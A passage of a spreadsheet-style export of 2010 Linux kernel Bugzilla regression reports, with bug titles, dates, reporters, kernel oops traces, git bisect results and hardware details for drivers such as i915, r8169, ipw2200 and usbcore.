    <t>After loading a recent wireless-testing kernel (based on 2.6.33-rc8) on my T41 I noticed an unacceptabel sluggishness. Opening gnome-terminal took a long time, firefox took so long I rebooted before it ever came-up, etc. The w command continually reported a load average for between 2 and 3 on an apparently idle box. A git bisect session identified this patch: commit db78e27de7e29a6db6be7caf607cf803d84094aa Author: Francisco Jerez &lt;currojerez@riseup.net&gt; Date: Tue Jan 12 18:49:43 2010 +0100 drm/ttm: Avoid conflicting reserve_memtype during ttm_tt_set_page_caching. Fixes errors like: &gt; reserve_ram_pages_type failed 0x15b7a000-0x15b7b000, track 0x8, req 0x10 when a BO is moved between WC and UC areas. Reported-by: Xavier Chantry &lt;shiningxc@gmail.com&gt; Signed-off-by: Francisco Jerez &lt;currojerez@riseup.net&gt; Acked-by: Thomas Hellstrom &lt;thellstrom@vmware.com&gt; Signed-off-by: Dave Airlie &lt;airlied@redhat.com&gt; Just to verify, I sent back to my wireless-testing tree and reverted that patch. This restored normal/acceptable performance. If you need/want testing or whatnot just let me know...</t>
  </si>
  <si>
    <t>Load goes up very high when we traverse the large tree</t>
  </si>
  <si>
    <t>2010-02-17 11:43 UTC</t>
  </si>
  <si>
    <t>2011-02-03 08:44 UTC</t>
  </si>
  <si>
    <t>Created attachment 25088 [details] dmesg of kernel 2.6.32 Hi, When I do a "find" or a "du" on a large tree the load goes up very high (over 160) to hang the system. A ctrl-C can kill the command and load back down quietly. I not had this problem with version 2.6.31. There is no error message in the logs. Regards.</t>
  </si>
  <si>
    <t>typo in help of PAGE_POISONING</t>
  </si>
  <si>
    <t>2010-02-17 17:35 UTC</t>
  </si>
  <si>
    <t>2012-05-12 13:36 UTC</t>
  </si>
  <si>
    <t>The help of PAGE_POISONING says: This option cannot enalbe with hibernation.</t>
  </si>
  <si>
    <t>coretemp driver doesn't support Intel Clarkdale and Arrandale CPUs (i3/i5/Pentium G6950)</t>
  </si>
  <si>
    <t>2010-02-18 18:28 UTC</t>
  </si>
  <si>
    <t>Created attachment 25106 [details] patch adding coretemp support for Intel Core i5 650 CPU # modprobe coretemp coretemp: Unknown CPU model 25 The attached patch makes coretemp work, but temperature readings look an overkill ... coretemp-isa-0000 Adapter: ISA adapter Core 0: +21.0°C (high = +84.0°C, crit = +100.0°C) coretemp-isa-0001 Adapter: ISA adapter Core 1: +28.0°C (high = +84.0°C, crit = +100.0°C) coretemp-isa-0002 Adapter: ISA adapter Core 2: +21.0°C (high = +84.0°C, crit = +100.0°C) coretemp-isa-0003 Adapter: ISA adapter Core 3: +27.0°C (high = +84.0°C, crit = +100.0°C) ... since this CPU has only two physical cores. cat /proc/cpuinfo processor : 0 vendor_id : GenuineIntel cpu family : 6 model : 37 model name : Intel(R) Core(TM) i5 CPU 650 @ 3.20GHz stepping : 2 cpu MHz : 1200.000 cache size : 4096 KB physical id : 0 siblings : 4 core id : 0 cpu cores : 2 apicid : 0 initial apicid : 0 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 11 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx rdtscp lm constant_tsc arch_perfmon pebs bts xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm sse4_1 sse4_2 popcnt aes lahf_lm ida arat tpr_shadow vnmi flexpriority ept vpid bogomips : 6626.51 clflush size : 64 cache_alignment : 64 address sizes : 36 bits physical, 48 bits virtual power management:</t>
  </si>
  <si>
    <t>Issue: r6040 crashes in function r6040_multicast_list</t>
  </si>
  <si>
    <t>2010-02-19 10:00 UTC</t>
  </si>
  <si>
    <t>spamalot</t>
  </si>
  <si>
    <t>2011-01-24 12:40 UTC</t>
  </si>
  <si>
    <t>Created attachment 25113 [details] dmesg output and crash log Starting avahi-daemon on Debian 5.0.3 triggers the function r6040_multicast_list which crashes the kernel. This bug was already submitted to the avahi mailing list on 4th of January 2010 by Mike Miller. Lennart Poettering suggested that this issue has to be addressed to the kernel development team. I haven't seen neither a follow-up on the avahi list, nor a bug report in bugzilla. As I'm suffering from the same problem, I'm picking up the issue and would like to file this bug report, hoping anybody can help fixing. In case any additional information is needed, I'm happy to provide such. Hardware: SBC with Vortex86DX CPU (integrated R6040 Ethernet Controller) OS: Debian 5.0.3 with custom built kernel from latest stable release (2.6.32.8) Best regards, Patrick</t>
  </si>
  <si>
    <t>sysfs oops when reading current_clocksource if GENERIC_TIME=n</t>
  </si>
  <si>
    <t>2010-02-21 20:19 UTC</t>
  </si>
  <si>
    <t>Aaro Koskinen</t>
  </si>
  <si>
    <t>2010-04-05 22:07 UTC</t>
  </si>
  <si>
    <t>curr_clocksource is uninitialized if GENERIC_TIME=n # cat /sys/devices/system/clocksource/clocksource0/current_clocksource [ 187.940000] Unable to handle kernel NULL pointer dereference at virtual address 00000000 [ 187.960000] pgd = df160000 [ 187.960000] [00000000] *pgd=bf11a031, *pte=00000000, *ppte=00000000 [ 187.970000] Internal error: Oops: 17 [#1] PREEMPT [ 187.970000] last sysfs file: /sys/devices/system/clocksource/clocksource0/current_clocksource [ 187.970000] Modules linked in: [ 187.970000] CPU: 0 Not tainted (2.6.32.8-iop32x #13) [ 187.970000] PC is at sysfs_show_current_clocksources+0x2c/0x58 [ 187.970000] LR is at sysfs_show_current_clocksources+0x18/0x58 [ 187.970000] pc : [&lt;c006b530&gt;] lr : [&lt;c006b51c&gt;] psr: 60000013 [ 187.970000] sp : df0b9f10 ip : 00000000 fp : beff0cb0 [ 187.970000] r10: c043e3cc r9 : df0eabd8 r8 : df0b9f80 [ 187.970000] r7 : 00000fff r6 : df8be960 r5 : c042e0f8 r4 : df10b000 [ 187.970000] r3 : c0472980 r2 : c03b02d8 r1 : 00001000 r0 : df10b000 [ 187.970000] Flags: nZCv IRQs on FIQs on Mode SVC_32 ISA ARM Segment user [ 187.970000] Control: 0000397f Table: bf160000 DAC: 00000015 [ 187.970000] Process cat (pid: 514, stack limit = 0xdf0b8270) [ 187.970000] Stack: (0xdf0b9f10 to 0xdf0ba000) [ 187.970000] 9f00: df0eabd8 c042e154 df0eabc0 c01e6f90 [ 187.970000] 9f20: c042e154 c0115da8 00100077 df0c87e8 00000021 00001000 00000000 df10fb80 [ 187.970000] 9f40: beff0cb0 df0b9f80 00001000 00001000 df0b8000 00000000 00000001 c00c6fc0 [ 187.970000] 9f60: c00c45cc c003eff0 00000000 00000000 df10fb80 00001000 beff0cb0 c00c7144 [ 187.970000] 9f80: 00000000 00000000 beff1f5f 00000000 00001000 beff0cb0 001da4e0 00000003 [ 187.970000] 9fa0: c002a128 c0029f60 00001000 beff0cb0 00000003 beff0cb0 00001000 001d9b30 [ 187.970000] 9fc0: 00001000 beff0cb0 001da4e0 00000003 00000001 beff0cb0 00000000 00000001 [ 187.970000] 9fe0: 00000003 beff0c90 0000c034 00008d6c 60000010 00000003 ffffffff ffffffff [ 187.970000] [&lt;c006b530&gt;] (sysfs_show_current_clocksources+0x2c/0x58) from [&lt;c01e6f90&gt;] (sysdev_show+0x20/0x28) [ 187.970000] [&lt;c01e6f90&gt;] (sysdev_show+0x20/0x28) from [&lt;c0115da8&gt;] (sysfs_read_file+0x9c/0x130) [ 187.970000] [&lt;c0115da8&gt;] (sysfs_read_file+0x9c/0x130) from [&lt;c00c6fc0&gt;] (vfs_read+0xb0/0x164) [ 187.970000] [&lt;c00c6fc0&gt;] (vfs_read+0xb0/0x164) from [&lt;c00c7144&gt;] (sys_read+0x40/0x70) [ 187.970000] [&lt;c00c7144&gt;] (sys_read+0x40/0x70) from [&lt;c0029f60&gt;] (ret_fast_syscall+0x0/0x38) [ 187.970000] Code: e3a01a01 e59f202c e593c000 e1a00004 (e59c3000) [ 188.170000] ---[ end trace 206df0d3d88ba60c ]---</t>
  </si>
  <si>
    <t>i915: resume from hibernate locks up every 2nd time</t>
  </si>
  <si>
    <t>2010-02-21 20:50 UTC</t>
  </si>
  <si>
    <t>2010-02-22 22:13 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.33-rc8 regression on i915: resume from hibernate locks up every 2nd time Submitter : Pedro Ribeiro &lt;pedrib@gmail.com&gt; Date : 2010-02-17 18:47 Message-ID : 74fd948d1002171047g70d2bba0l957e264dfbc8ea23@mail.gmail.com References : http://marc.info/?l=linux-kernel&amp;m=126643245012840&amp;w=4 Handled-By : "Rafael J. Wysocki" &lt;rjw@sisk.pl&gt; Patch : http://patchwork.kernel.org/patch/80456/ This entry is being used for tracking a regression from 2.6.32. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>regression (oops) with usb in 2.6.33-rc8</t>
  </si>
  <si>
    <t>2.6.33-rc8 bee415ce427d1eab6cfb30221461c7d20cbf1903</t>
  </si>
  <si>
    <t>2010-02-23 10:58 UTC</t>
  </si>
  <si>
    <t>Christophe Fergeau</t>
  </si>
  <si>
    <t>2010-12-08 06:53 UTC</t>
  </si>
  <si>
    <t>Created attachment 25172 [details] lsusb -v before running the program that triggers the oops While "playing" (ie sending it random stuff with libusb) with an iPod nano with a recent kernel (tested with 2.6.33-rc8 and git master from a few hours ago), I'm getting a kernel oops : BUG: unable to handle kernel NULL pointer dereference at 0000000000000010 IP: [&lt;ffffffffa00e7079&gt;] usb_altnum_to_altsetting+0x9/0x60 [usbcore] PGD 6b802067 PUD 6b9ad067 PMD 0 Oops: 0000 [#1] SMP last sysfs file: /sys/devices/pci0000:00/0000:00:1a.7/usb1/1-2/devnum CPU 1 Pid: 4349, comm: python Not tainted 2.6.33-desktop-0.rc8.1mnb #1 Mac-F22788A9/MacBook4,1 RIP: 0010:[&lt;ffffffffa00e7079&gt;] [&lt;ffffffffa00e7079&gt;] usb_altnum_to_altsetting+0x9/0x60 [usbcore] RSP: 0018:ffff880068011d18 EFLAGS: 00010246 RAX: 0000000000000001 RBX: 0000000000000001 RCX: ffff88006f8905f0 RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000 RBP: ffff880068011d18 R08: 0000000000000000 R09: 0000000000000000 R10: 0000000000000000 R11: 0000000000000000 R12: ffff88007c573800 R13: ffff880068042c00 R14: 0000000000000000 R15: 00000000ffffffb5 FS: 00007f224c9f0700(0000) GS:ffff880001b00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b CR2: 0000000000000010 CR3: 000000006b815000 CR4: 00000000000006e0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 Process python (pid: 4349, threadinfo ffff880068010000, task ffff88006b8c4350) Stack: ffff880068011d88 ffffffffa00f4213 0000000000000000 ffff880000000000 &lt;0&gt; ffff880000001388 ffffffff810df769 ffff88006da3e400 ffff88007c377d50 &lt;0&gt; ffff880068011d88 0000000000000000 ffff88007c9a3240 00007fff620c8c8c Call Trace: [&lt;ffffffffa00f4213&gt;] usb_reset_configuration+0x123/0x250 [usbcore] [&lt;ffffffff810df769&gt;] ? filemap_fault+0xb9/0x450 [&lt;ffffffffa00ff34d&gt;] usbdev_do_ioctl+0xcdd/0x12c0 [usbcore] [&lt;ffffffff810f9a59&gt;] ? __do_fault+0x3b9/0x4b0 [&lt;ffffffff813b8e07&gt;] ? _lock_kernel+0x47/0xad [&lt;ffffffffa00ff9f8&gt;] usbdev_ioctl+0x48/0x80 [usbcore] [&lt;ffffffff81137ffd&gt;] vfs_ioctl+0x3d/0xd0 [&lt;ffffffff8113858a&gt;] do_vfs_ioctl+0x8a/0x5a0 [&lt;ffffffff811f4166&gt;] ? __up_read+0xa6/0xd0 [&lt;ffffffff8107bcde&gt;] ? up_read+0xe/0x10 [&lt;ffffffff81138b21&gt;] sys_ioctl+0x81/0xa0 [&lt;ffffffff8100a002&gt;] system_call_fastpath+0x16/0x1b Code: 0f b6 7f 02 39 f7 74 c1 83 c2 01 44 39 c2 7c e2 31 c0 eb b5 66 66 66 66 66 2e 0f 1f 84 00 00 00 00 00 55 48 89 e5 0f 1f 44 00 00 &lt;44&gt; 8b 47 10 45 85 c0 74 35 48 8b 07 31 d2 0f b6 48 03 39 f1 75 RIP [&lt;ffffffffa00e7079&gt;] usb_altnum_to_altsetting+0x9/0x60 [usbcore] RSP &lt;ffff880068011d18&gt; CR2: 0000000000000010 ---[ end trace ded3cae37b595f91 ]--- I bisected it to http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=3f0479e0 With this commit, the oops happens, right before this commit, my test program just fails with Traceback (most recent call last): File "./ipoddfu.py", line 32, in &lt;module&gt; dev = libipoddfu.ipoddfu() File "/home/teuf/hack/ipoddfu/snapshot-201002150047/tools/libipoddfu.py", line 76, in __init__ self.handle.setConfiguration(1) usb.USBError: Numerical result out of range (which is an acceptable result to me since the iPod is in a pretty bad state at that point).</t>
  </si>
  <si>
    <t>CPU loses support for mwait instruction following suspend/resume</t>
  </si>
  <si>
    <t>2010-02-24 16:57 UTC</t>
  </si>
  <si>
    <t>2010-06-28 19:25 UTC</t>
  </si>
  <si>
    <t>On my desktop system (Intel ICH5 chipset), the i915 video driver hangs during resume from RAM. The screen remains blank and the CapsLock and ScrollLock LEDs on the keyboard start blinking. The guilty driver was confirmed with CONFIG_PM_TRACE_RTC. Other relevant config entries include: CONFIG_DRM=y CONFIG_DRM_KMS_HELPER=y CONFIG_DRM_I915=y CONFIG_DRM_I915_KMS=y CONFIG_FB=y CONFIG_FRAMEBUFFER_CONSOLE=y When I boot with "vga=0 acpi_sleep=sci_force_enable init=/bin/bash" and no initramdisk, the screen does switch to the framebuffer console (with a nearly-unreadable 160x60 character display) but the system still hangs during resume. CONFIG_X86_CHECK_BIOS_CORRUPTION does not report any problems. The graphics adapter is: 00:02.0 VGA compatible controller: Intel Corporation 82865G Integrated Graphics Controller (rev 02) (prog-if 00 [VGA controller]) Subsystem: GVC/BCM Advanced Research Device 2181 Flags: bus master, fast devsel, latency 0, IRQ 16 Memory at f0000000 (32-bit, prefetchable) [size=128M] Memory at fe780000 (32-bit, non-prefetchable) [size=512K] I/O ports at ec00 [size=8] Expansion ROM at &lt;unassigned&gt; [disabled] Capabilities: &lt;access denied&gt; Kernel driver in use: i915 Kernel modules: i915 Possibly related are these log messages that appear during every startup: [drm] Initialized drm 1.1.0 20060810 i915 0000:00:02.0: PCI INT A -&gt; GSI 16 (level, low) -&gt; IRQ 16 i915 0000:00:02.0: setting latency timer to 64 fbcon: inteldrmfb (fb0) is primary device render error detected, EIR: 0x00000010 [drm:i915_handle_error] *ERROR* EIR stuck: 0x00000010, masking render error detected, EIR: 0x00000010 [drm] DAC-5: set mode 640x480 16</t>
  </si>
  <si>
    <t>resume after hibernate: /dev/sdb returns as /dev/sdd</t>
  </si>
  <si>
    <t>2.6.32.10, 2.6.32.7, 2.6.31.12</t>
  </si>
  <si>
    <t>2010-02-25 14:58 UTC</t>
  </si>
  <si>
    <t>Oleksandr Yermolenko</t>
  </si>
  <si>
    <t>2011-01-17 22:23 UTC</t>
  </si>
  <si>
    <t>Created attachment 25217 [details] normal bootup and bad resume after hibernate for 2.6.32.7 Hard drive (Seagate ST3500320AS with SD1A firmware) sometimes changes its name from /dev/sdb to /dev/sdd after resuming from hibernate. The frequency of the event is low (about one event per 10 hibernate/resume cycles). Other HDDs (SAMSUNG HD321KJ (/dev/sda) and WDC WD15EARS-00Z5B1 (/dev/sdc)) never change their /dev/sdX names after resume (I have not noticed that yet). I have experienced this problem on kernels 2.6.31.12 and 2.6.32.7 on Debian squeeze amd64. Kernels are from kernel.org and built with make-kpkg. Kernel configs and logs are attached. Note that numbers in "n_sectors mismatch" message: n_sectors mismatch 976773168 != 976771055 are the same as in "HPA detected" message: HPA detected: current 976771055, native 976773168 I'll attach pure dmesg output as soon as I'll be lucky in reproducing this bug. Thanks.</t>
  </si>
  <si>
    <t>All Lenovo i5/i7 notebooks do not resume properly after suspend - system resumes but will hang if resumed a second time</t>
  </si>
  <si>
    <t>2010-02-27 00:31 UTC</t>
  </si>
  <si>
    <t>Bryn Hughes</t>
  </si>
  <si>
    <t>2015-03-17 02:27 UTC</t>
  </si>
  <si>
    <t>After unloading drivers that cause problems with suspend (xhci, bluetooth, etc) the system can suspend OK. On resume however this message is displayed in dmesg: [18446744064.763411] irq 9: nobody cared (try booting with the "irqpoll" option) [18446744064.763419] Pid: 0, comm: swapper Tainted: G W 2.6.32-14-generic #20-Ubuntu [18446744064.763423] Call Trace: [18446744064.763426] &lt;IRQ&gt; [&lt;ffffffff810c4c1b&gt;] __report_bad_irq+0x2b/0xa0 [18446744064.763439] [&lt;ffffffff810c4e1c&gt;] note_interrupt+0x18c/0x1d0 [18446744064.763446] [&lt;ffffffff81019f09&gt;] ? read_tsc+0x9/0x20 [18446744064.763452] [&lt;ffffffff810c551d&gt;] handle_fasteoi_irq+0xdd/0x100 [18446744064.763457] [&lt;ffffffff81015d52&gt;] handle_irq+0x22/0x30 [18446744064.763465] [&lt;ffffffff81563bdc&gt;] do_IRQ+0x6c/0xf0 [18446744064.763472] [&lt;ffffffff81013b53&gt;] ret_from_intr+0x0/0x11 [18446744064.763475] &lt;EOI&gt; [&lt;ffffffff813086c0&gt;] ? acpi_idle_enter_bm+0x283/0x2b7 [18446744064.763486] [&lt;ffffffff813086b9&gt;] ? acpi_idle_enter_bm+0x27c/0x2b7 [18446744064.763492] [&lt;ffffffff8144c567&gt;] ? cpuidle_idle_call+0xa7/0x140 [18446744064.763497] [&lt;ffffffff81011ea3&gt;] ? cpu_idle+0xb3/0x110 [18446744064.763504] [&lt;ffffffff81558aad&gt;] ? start_secondary+0xa8/0xaa [18446744064.763508] handlers: [18446744064.763510] [&lt;ffffffff812de974&gt;] (acpi_irq+0x0/0x31) [18446744064.763517] Disabling IRQ #9 If the system is suspended a second time, it will not resume and instead shows a BIOS screen and must be hard booted. Note this issue likely affects the following Lenovo models: T410 T410s T510 T510i W510 W510i W710</t>
  </si>
  <si>
    <t>WARNING: at net/mac80211/mlme.c:2090 ieee80211_sta_work</t>
  </si>
  <si>
    <t>2010-02-27 08:45 UTC</t>
  </si>
  <si>
    <t>2010-03-21 19:50 UTC</t>
  </si>
  <si>
    <t>Created attachment 25258 [details] here is dmesg This bug appears only on 2.6.33 release, on previous versions and 2.6.33 rcs I didn't catch it. It appears after resume from s2ram. After I do "rmmod iwlagn" and then "modprobe iwlagn" wireless starts working. I use "03:00.0 Network controller: Intel Corporation PRO/Wireless 4965 AG or AGN [Kedron] Network Connection (rev 61)" on my Thinkpad T61</t>
  </si>
  <si>
    <t>ipw2200: requesting scan causes connection drops</t>
  </si>
  <si>
    <t>2.6.32.9</t>
  </si>
  <si>
    <t>2010-03-01 17:26 UTC</t>
  </si>
  <si>
    <t>Maurizio Avogadro</t>
  </si>
  <si>
    <t>2010-08-18 19:21 UTC</t>
  </si>
  <si>
    <t>Created attachment 25292 [details] Commented dmesg (ipw2200 debug=255) Overview: Since long time (at least 2.6.24), with some networks the connection gets systematically dropped when a scan is requested (i.e. by NetworkManager). Steps to reproduce: I could always reproduce this issue by stopping NetworkManager and manually configuring a wireless connection to an affected network in /etc/network/interfaces (ifupdown uses wpa_supplicant, like NM does): when the connection is active, a iwlist ethx scan command always causes ap disassociation and subsequent connection drop. If no scans are requested the connection is very reliable and fast and lasts hours (no disassociations happen). Actual results: The card gets disassociated from the ap and the connection drops. Expected results: The connection shouldn't drop when scanning is requested. Build date and platform: Debian Sid i386 current (kernel 2.6.32-9) on an Acer TravelMate 435LMi + Intel ProWireless 2915 (ipw2200). Additional info: - wireless device lspci -vvv: 02:02.0 Network controller: Intel Corporation PRO/Wireless 2915ABG [Calexico2] Network Connection (rev 05) Subsystem: Intel Corporation Device 1001 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 32 (750ns min, 6000ns max), Cache Line Size: 32 bytes Interrupt: pin A routed to IRQ 18 Region 0: Memory at d0200000 (32-bit, non-prefetchable) [size=4K] Capabilities: [dc] Power Management version 2 Flags: PMEClk- DSI+ D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=1 PME- Kernel driver in use: ipw2200 - note: The logfile I'm attaching refers to a connection to a Linksys WAG325N: the ap was 3mt far from the laptop, no matter whether the 802.11n features were enabled or not, whether the ESSID was broadcasted or not and regardless of used encryption (RSN or WPA). The ipw2200 module was loaded with no additional parameters. Thanks Maurizio</t>
  </si>
  <si>
    <t>2011-02-24 15:24 UTC</t>
  </si>
  <si>
    <t>[cppcheck] found a memory leak in linux-2.6/fs/nfs/nfs4proc.c at line 5111</t>
  </si>
  <si>
    <t>2.6 git head</t>
  </si>
  <si>
    <t>2010-03-06 20:18 UTC</t>
  </si>
  <si>
    <t>2010-04-14 12:16 UTC</t>
  </si>
  <si>
    <t>Created attachment 25390 [details] fix during a check of the current git head of the linux kernel with the static code analysis tool cppcheck (http://sourceforge.net/apps/mediawiki/cppcheck/index.php?title=Main_Page) the tool discovered a memory leak in linux-2.6/fs/nfs/nfs4proc.c Please refer the attached patch, that fixes the issue. Best regards Ettl Martin</t>
  </si>
  <si>
    <t>2.6.33 problems</t>
  </si>
  <si>
    <t>2010-03-07 09:17 UTC</t>
  </si>
  <si>
    <t>2012-03-13 23:21 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.33 problems Submitter : werner@guyane.dyn-o-saur.com Date : 2010-02-27 17:09 Message-ID : 1267290551.13148@guyane.dyn-o-saur.com References : http://marc.info/?l=linux-kernel&amp;m=126729183719672&amp;w=2 Handled-By : Tejun Heo &lt;tj@kernel.org&gt; This entry is being used for tracking a regression from 2.6.32. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>IWLAGN gives errors with 802.11n enabled</t>
  </si>
  <si>
    <t>2010-03-07 19:22 UTC</t>
  </si>
  <si>
    <t>I have an Intel 5300 card which but I can have a reliable connection unless I disable 802.11n operations. I have a ful error log with both kernel 2.6.32 and 2.6.33. Will try the compat-wireless drivers soon</t>
  </si>
  <si>
    <t>r8169 fails to bring up ethernet</t>
  </si>
  <si>
    <t>2010-03-07 23:57 UTC</t>
  </si>
  <si>
    <t>2010-04-10 02:56 UTC</t>
  </si>
  <si>
    <t>Created attachment 25399 [details] System log With the release 2.6.33 the kernel can't bring up my ethernet. I have found the commit which broke it: root@raver:/usr/src/linux-2.6# git bisect good ac1aa47b131416a6ff37eb1005a0a1d2541aad6c is the first bad commit commit ac1aa47b131416a6ff37eb1005a0a1d2541aad6c Author: Jesse Barnes &lt;jbarnes@virtuousgeek.org&gt; Date: Mon Oct 26 13:20:44 2009 -0700 PCI: determine CLS more intelligently Till now, CLS has been determined either by arch code or as L1_CACHE_BYTES. Only x86 and ia64 set CLS explicitly and x86 doesn't always get it right. On most configurations, the chance is that firmware configures the correct value during boot. This patch makes pci_init() determine CLS by looking at what firmware has configured. It scans all devices and if all non-zero values agree, the value is used. If none is configured or there is a disagreement, pci_dfl_cache_line_size is used. arch can set the dfl value (via PCI_CACHE_LINE_BYTES or pci_dfl_cache_line_size) or override the actual one. ia64, x86 and sparc64 updated to set the default cls instead of the actual one. While at it, declare pci_cache_line_size and pci_dfl_cache_line_size in pci.h and drop private declarations from arch code. Signed-off-by: Tejun Heo &lt;tj@kernel.org&gt; Acked-by: David Miller &lt;davem@davemloft.net&gt; Acked-by: Greg KH &lt;gregkh@suse.de&gt; Cc: Ingo Molnar &lt;mingo@elte.hu&gt; Cc: Thomas Gleixner &lt;tglx@linutronix.de&gt; Cc: Tony Luck &lt;tony.luck@intel.com&gt; Signed-off-by: Jesse Barnes &lt;jbarnes@virtuousgeek.org&gt; :040000 040000 8b20ad60ed3e273b74bfb588dbea6948547e8de1 92498585770ca360c2716c0d3c55d5f4a37356a1 M arch :040000 040000 56d1abd61286dd303bb37c2002b699e526988f85 3f20bba2d1e107a80a738e3561fc0fa92e0c4024 M drivers :040000 040000 26d85393248c542ca2cea0e3ac4ceabd0ea659aa 326cbb98321cd4e490d888f48bc584b3662c8f06 M include</t>
  </si>
  <si>
    <t>[regression] Fails to boot properly unless given pci=nocrs</t>
  </si>
  <si>
    <t>2010-03-09 01:24 UTC</t>
  </si>
  <si>
    <t>2010-04-26 20:59 UTC</t>
  </si>
  <si>
    <t>Created attachment 25416 [details] boot log without using pci=nocrs Since commit 7bc5e3f2be32ae6fb0c74cd0f707f986b3a01a26 x86/PCI: use host bridge _CRS info by default on 2008 and newer machines my systems fails to boot properly GigaByte GA-MA78GM-S2H rev.1.0 with BIOS - F11, 09/16/2009 The attached log ends at the point where I decided to reboot</t>
  </si>
  <si>
    <t>BUG: key ffff88013d4f4c70 not in .data! when loading microcode.ko</t>
  </si>
  <si>
    <t>2010-03-09 16:28 UTC</t>
  </si>
  <si>
    <t>2010-03-21 23:35 UTC</t>
  </si>
  <si>
    <t>Created attachment 25426 [details] Full dmesg output for 2.6.34-rc1 on my machine When loading the module microcode.ko on my 64-bit system, I get the following dump on the kernel log: [ 10.774690] ------------[ cut here ]------------ [ 10.774726] WARNING: at kernel/lockdep.c:2706 lockdep_init_map+0x114/0x130() [ 10.774759] Hardware name: [ 10.774774] Modules linked in: microcode(+) kvm_intel kvm uinput snd_hda_codec_realtek snd_hda_intel snd_hda_codec snd_hwdep snd_seq snd_seq_device snd_pcm snd_timer snd i2c_i801 soundcore iTCO_wdt snd_page_alloc iTCO_vendor_support ppdev parport_pc parport pcspkr r8169 mii dm_multipath i915 drm_kms_helper drm i2c_algo_bit i2c_core video output [last unloaded: scsi_wait_scan] [ 10.775026] Pid: 1939, comm: modprobe Not tainted 2.6.34-rc1 #9 [ 10.775048] Call Trace: [ 10.775063] [&lt;ffffffff81048006&gt;] warn_slowpath_common+0x76/0xb0 [ 10.775087] [&lt;ffffffff8104804f&gt;] warn_slowpath_null+0xf/0x20 [ 10.775109] [&lt;ffffffff81073c34&gt;] lockdep_init_map+0x114/0x130 [ 10.775139] [&lt;ffffffff8115b3aa&gt;] sysfs_add_file_mode+0x6a/0xc0 [ 10.775163] [&lt;ffffffff8115b40c&gt;] sysfs_add_file+0xc/0x10 [ 10.775185] [&lt;ffffffff8115d8a1&gt;] sysfs_create_bin_file+0x21/0x30 [ 10.775209] [&lt;ffffffff812945bd&gt;] _request_firmware+0x21d/0x4e0 [ 10.775232] [&lt;ffffffff8129490e&gt;] request_firmware+0xe/0x10 [ 10.775256] [&lt;ffffffffa00f1bc1&gt;] request_microcode_fw+0x61/0xa0 [microcode] [ 10.775283] [&lt;ffffffff8115db01&gt;] ? internal_create_group+0xc1/0x1a0 [ 10.775309] [&lt;ffffffffa00f13b8&gt;] microcode_init_cpu+0xb8/0xd0 [microcode] [ 10.775336] [&lt;ffffffffa00f1426&gt;] mc_sysdev_add+0x56/0x70 [microcode] [ 10.775361] [&lt;ffffffff8128a04e&gt;] sysdev_driver_register+0x9e/0x130 [ 10.775386] [&lt;ffffffffa0130000&gt;] ? microcode_init+0x0/0x12b [microcode] [ 10.775412] [&lt;ffffffffa01300be&gt;] microcode_init+0xbe/0x12b [microcode] [ 10.775438] [&lt;ffffffff810001d7&gt;] do_one_initcall+0x37/0x190 [ 10.775462] [&lt;ffffffff8107fe4b&gt;] sys_init_module+0xdb/0x250 [ 10.775485] [&lt;ffffffff81002e6b&gt;] system_call_fastpath+0x16/0x1b [ 10.775508] ---[ end trace e0218cb5fc4c0bc8 ]--- This dump did not appear with vanilla 2.6.33. Steps to reproduce: 1) compile 2.6.34-rc1 with attached configuration 2) run on 64-bit intel machine 3) load microcode.ko or make system configuration load it. Actual results: kernel dump as shown above Expected results: no dump, microcode should load normally</t>
  </si>
  <si>
    <t>Flood of SELinux denials on polkitd</t>
  </si>
  <si>
    <t>2010-03-09 16:47 UTC</t>
  </si>
  <si>
    <t>2010-03-22 21:17 UTC</t>
  </si>
  <si>
    <t>Created attachment 25431 [details] Sample audit.log file filled with polkitd denials This might be in the wrong category. I could not find a category for SELinux bugs. When booting 2.6.34-rc1 on a Fedora 12 x86_64 system with the latest updates (as of 2010-03-08), I get a very strange behavior that was not present in vanilla 2.6.33. I see that the setroubleshootd daemon is constantly at around 16 percent CPU usage (as shown by top). In addition I see that the file /var/log/audit/audit.log , where SELinux denials are stored, grows to around 5 MB repeatedly and then gets truncated, over and over. A sample of the audit.log is attached. I see that all of the messages are about polkitd. Steps to reproduce: 1) Compile 2.6.34-rc1 with attached configuration. 2) Reboot with 2.6.34-rc1 and Fedora 12 x86_64 3) Watch CPU usage and size of audit.log Actual results: System (even in idle state) gets around 16 percent activity from setroubleshootd and audit.log fills itself with polkitd denials. Expected results: setroubleshootd should remain dormant and audit.log should stay static, in idle state.</t>
  </si>
  <si>
    <t>2.6.34-rc1 crashes early while startup</t>
  </si>
  <si>
    <t>2010-03-09 19:40 UTC</t>
  </si>
  <si>
    <t>2010-04-07 20:21 UTC</t>
  </si>
  <si>
    <t>Created attachment 25433 [details] config for 2.6.34-rc1 Screenshots to follow. config attached.</t>
  </si>
  <si>
    <t>patch to support for NEC WL300NU-G - ar9170 based USB wifi card</t>
  </si>
  <si>
    <t>2010-03-09 20:12 UTC</t>
  </si>
  <si>
    <t>Ben Konrath</t>
  </si>
  <si>
    <t>2010-04-21 15:03 UTC</t>
  </si>
  <si>
